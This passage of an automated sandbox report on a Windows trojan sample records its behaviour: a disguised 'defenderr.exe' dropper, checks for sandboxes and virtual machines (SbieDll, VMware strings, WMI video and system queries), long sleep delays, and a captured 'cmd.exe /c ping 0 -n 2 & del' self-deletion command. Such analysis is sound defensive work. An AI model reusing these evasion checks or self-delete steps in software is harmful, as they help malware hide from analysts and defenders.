Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: defenderr.exe, 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL@+

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712	Thread sleep count: 9476 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe TID: 6776	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe TID: 3520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe TID: 3360	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Dropped PE file which has not been started: C:\Users\user\Desktop\svchosts.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9476

Jump to behavior

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File Volume queried: C:\ FullSizeInformation

Source: defenderr.exe, 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: \vboxmrxnp.dll=cmd.exe /c ping 0 -n 2 & del "
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.552189300.000000001BE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}monProg
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.465191862.000000001D470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Q
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.465191862.000000001D470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \vmGuestLib.dll
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.552189300.000000001BE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \vboxmrxnp.dll
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002F23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.454682511.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWin%SystemRoot%\system32\mswsock.dllOCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\P
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.552189300.000000001BE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware6HVNXYT5Win32_VideoControllerVDV7WTK9VideoController120060621000000.000000-0008875.293display.infMSBDAYNVZ15XSPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors975STVFM**=N
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000

Anti Debugging

